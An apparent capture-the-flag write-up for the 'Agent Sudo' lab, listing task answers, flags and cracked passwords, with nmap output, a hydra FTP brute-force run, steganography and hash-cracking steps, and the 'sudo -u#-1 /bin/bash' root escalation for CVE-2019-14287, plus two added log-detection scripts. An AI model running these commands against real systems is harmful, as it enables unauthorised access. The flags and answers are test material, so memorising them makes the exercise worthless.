Agent Sudo

January 05, 2024

Task 1 Author note

Task 2 Enumerate

3

user-agent

chris

Task 3 Hash cracking and brute-force

crystal

alien

area51

james

hackerrules!

Task 4 Capture the user flag

b03d975e8c92a7c04146cfa7a5a313c7

Roswell alien autopsy

Task 5 Privilege escalation

CVE-2019-14287

b53a02f55b57d4439e3341834d70c062

deskel

nmap -sC -sV -oN nmap 10.10.84.161 -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-05 09:23 PST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:23
Completed NSE at 09:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:23
Completed NSE at 09:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:23
Completed NSE at 09:23, 0.00s elapsed
Initiating Ping Scan at 09:23
Scanning 10.10.84.161 [2 ports]
Completed Ping Scan at 09:23, 0.28s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:23
Completed Parallel DNS resolution of 1 host. at 09:23, 1.18s elapsed
Initiating Connect Scan at 09:23
Scanning 10.10.84.161 [1000 ports]
Discovered open port 21/tcp on 10.10.84.161
Discovered open port 80/tcp on 10.10.84.161
Discovered open port 22/tcp on 10.10.84.161
Increasing send delay for 10.10.84.161 from 0 to 5 due to max_successful_tryno increase to 4
Completed Connect Scan at 09:24, 21.51s elapsed (1000 total ports)
Initiating Service scan at 09:24
Scanning 3 services on 10.10.84.161
Completed Service scan at 09:24, 6.65s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.84.161.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 10.29s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 2.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
Nmap scan report for 10.10.84.161
Host is up, received syn-ack (0.28s latency).
Scanned at 2024-01-05 09:23:38 PST for 41s
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef1f5d04d47795066072ecf058f2cc07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r
|   256 5e02d19ac4e7430662c19e25848ae7ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68=
|   256 2d005cb9fda8c8d880e3924f8b4f18e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Annoucement
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.49 seconds
curl -A "C" -L 10.10.84.161
Attention chris, <br><br>

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>

From,<br>
Agent R

-A sets a spoofed User-Agent header and -L makes curl follow any redirects.

Why "C"? There are 26 letters in the alphabet, and trying each one as the User-Agent shows that only the letter C gets the right (redirected) response.
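As an added example (not part of the original writeup), the following Python script shows how a defender would spot this kind of single-letter User-Agent probing in an Apache access log; the log lines, client IPs and the redirect target path are constructed for the example.

```python
import re
from collections import defaultdict

# Apache "combined" log format; the last quoted field is the User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: one client cycling single-letter User-Agents against /,
# plus ordinary browser traffic that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jan/2024:09:30:01 -0800] "GET / HTTP/1.1" 200 1043 "-" "A"
10.0.0.5 - - [05/Jan/2024:09:30:01 -0800] "GET / HTTP/1.1" 200 1043 "-" "B"
10.0.0.5 - - [05/Jan/2024:09:30:02 -0800] "GET / HTTP/1.1" 302 243 "-" "C"
10.0.0.5 - - [05/Jan/2024:09:30:02 -0800] "GET /redirect-target-placeholder HTTP/1.1" 200 311 "-" "C"
10.0.0.9 - - [05/Jan/2024:09:31:10 -0800] "GET / HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/121.0"
"""


def parse(log_text):
    """Yield one dict per well-formed combined-format line."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_ua_enumeration(log_text, threshold=2):
    """Return {ip: sorted single-character User-Agents} for every client that
    sent at least `threshold` distinct one-character User-Agents."""
    seen = defaultdict(set)
    for rec in parse(log_text):
        if len(rec["ua"]) == 1:
            seen[rec["ip"]].add(rec["ua"])
    return {ip: sorted(uas) for ip, uas in seen.items() if len(uas) >= threshold}


def redirected_agents(log_text):
    """User-Agents that received a 3xx on GET /, i.e. the one the server treats specially."""
    return sorted({rec["ua"] for rec in parse(log_text)
                   if rec["req"].startswith("GET / ") and rec["status"].startswith("3")})


if __name__ == "__main__":
    print("probing clients:", find_ua_enumeration(SAMPLE_LOG))
    print("redirected agents:", redirected_agents(SAMPLE_LOG))
```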

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.92.72
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-05 10:45:28
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.92.72:21/
[STATUS] 159.00 tries/min, 159 tries in 00:01h, 14344240 to do in 1503:36h, 16 active
[21][ftp] host: 10.10.92.72   login: chris   password: crystal
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-05 10:47:14

We can use hydra to find the password for the user chris.

Once we have the password we can log in to FTP.

ftp -p 10.10.92.72
Connected to 10.10.92.72.
220 (vsFTPd 3.0.3)
Name (10.10.92.72:kyou): chris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (10,10,92,72,51,30).
150 Here comes the directory listing.
-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png
226 Directory send OK.

Then we can use binwalk to extract the files hidden inside cutie.png.

After that we can run zip2john on the zip file located in the _cutie folder that binwalk produced.

Then we use john to crack the resulting hash.

After that we can use the recovered password to extract the hidden message from cute-alien.jpg.

That message gives us the next password, which is "hackerrules!".

I tried to get the jpg from james's directory with a Python web server and wget.

python3 -m http.server

wget http://10.10.105.112:8000//Alien_autospy.jpg

I just got the answer when I was using OSINT.

With just a simple command we can escalate privileges to root.

sudo -u#-1 /bin/bash

Description:
Sudo doesn't check that the specified user ID exists and runs the command as that arbitrary user ID with sudo privileges.
-u#-1 is converted to 0, which is root's ID.
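As an added defensive example (not from the original writeup), this Python snippet flags CVE-2019-14287 attempts in sudo's auth log entries (both the "#-1" and the unsigned "#4294967295" spelling of the run-as user) and checks whether a sudo version predates the 1.8.28 fix; the log lines and hostname are constructed.

```python
import re

# Constructed sample lines in sudo's default syslog layout
# ("user : TTY= ; PWD= ; USER= ; COMMAND=").
SAMPLE_AUTH_LOG = """\
Jan  5 10:51:02 agent-sudo sudo:    chris : TTY=pts/0 ; PWD=/home/chris ; USER=root ; COMMAND=/usr/bin/apt update
Jan  5 10:52:17 agent-sudo sudo:    james : TTY=pts/1 ; PWD=/home/james ; USER=#-1 ; COMMAND=/bin/bash
Jan  5 10:52:40 agent-sudo sudo:    james : TTY=pts/1 ; PWD=/home/james ; USER=#4294967295 ; COMMAND=/bin/bash
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.+)$")


def is_negative_uid_target(target):
    """True when the requested run-as user is '#-1' or its unsigned 32-bit
    equivalent '#4294967295'; either value makes setresuid() keep uid 0."""
    if not target.startswith("#"):
        return False
    try:
        uid = int(target[1:])
    except ValueError:
        return False
    return uid == -1 or uid == 0xFFFFFFFF


def find_cve_2019_14287_attempts(log_text):
    """Return (invoking user, requested target, command) for each suspicious entry."""
    hits = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if m and is_negative_uid_target(m.group("target")):
            hits.append((m.group("user"), m.group("target"), m.group("cmd")))
    return hits


def sudo_is_vulnerable(version):
    """CVE-2019-14287 was fixed in sudo 1.8.28; older releases are affected.
    Accepts strings like '1.8.21p2' (the 'pN' patch level is ignored)."""
    nums = [int(n) for n in re.findall(r"\d+", version)[:3]]
    nums += [0] * (3 - len(nums))
    return tuple(nums) < (1, 8, 28)


if __name__ == "__main__":
    for user, target, cmd in find_cve_2019_14287_attempts(SAMPLE_AUTH_LOG):
        print(f"ALERT: {user} requested USER={target} for {cmd}")
    print("1.8.21p2 vulnerable:", sudo_is_vulnerable("1.8.21p2"))
```

Pair the log check with the version check: on a patched host the "#-1" request is simply rejected, so the log entry alone indicates intent, not success.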
